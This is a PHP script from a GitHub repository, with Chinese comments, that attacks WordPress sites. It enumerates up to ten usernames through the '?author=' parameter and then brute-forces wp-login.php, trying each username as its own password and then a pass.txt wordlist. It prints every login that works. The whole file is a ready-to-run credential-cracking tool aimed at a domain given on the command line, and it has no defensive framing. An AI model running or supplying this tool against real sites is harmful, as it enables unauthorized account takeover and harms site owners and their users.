-
Notifications
You must be signed in to change notification settings - Fork 341
/
wordpressPASSWORD.php
84 lines (67 loc) · 2.23 KB
/
wordpressPASSWORD.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
<?php
set_time_limit(0);
$domain = $argv[1];
//获取用户名
for ($i=1; $i <= 10; $i++) {
$url = $domain."/?author=".$i;
$response = httprequest($url,0);
if ($response == 404) {
continue;
}
$pattern = "/author\/(.*)\/feed/";
preg_match($pattern, $response, $name);
$namearray[] = $name[1];
}
echo "共获取用户".count($namearray)."名用户\n";
echo "正在破解用户名与密码相同的用户:\n";
$crackname = crackpassword($namearray,"same");
$passwords = file("pass.txt");
echo "正在破解弱口令用户:\n";
if ($crackname) {
$namearray = array_diff($namearray,$crackname);
}
crackpassword($namearray,$passwords);
function crackpassword($namearray,$passwords){
global $domain;
$crackname = "";
foreach ($namearray as $name) {
$url = $domain."/wp-login.php";
if ($passwords == "same") {
$post = "log=".urlencode($name)."&pwd=".urlencode($name)."&wp-submit=%E7%99%BB%E5%BD%95&redirect_to=".urlencode($domain)."%2Fwp-admin%2F&testcookie=1";
$pos = strpos(httprequest($url,$post),'div id="login_error"');
if ($pos === false) {
echo "$name $name"."\n";
$crackname[] = $name;
}
}else{
foreach ($passwords as $pass) {
$post = "log=".urlencode($name)."&pwd=".urlencode($pass)."&wp-submit=%E7%99%BB%E5%BD%95&redirect_to=".urlencode($domain)."%2Fwp-admin%2F&testcookie=1";
$pos = strpos(httprequest($url,$post),'div id="login_error"');
if ($pos === false) {
echo "$name $pass"."\n";
}
}
}
}
return $crackname;
}
function httprequest($url,$post){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$url");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1);
if($post){
curl_setopt($ch, CURLOPT_POST, 1);//post提交方式
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
}
$output = curl_exec($ch);
$httpcode = curl_getinfo($ch,CURLINFO_HTTP_CODE);
curl_close($ch);
if ($httpcode == 404) {
return 404;
}else{
return $output;
}
}
?>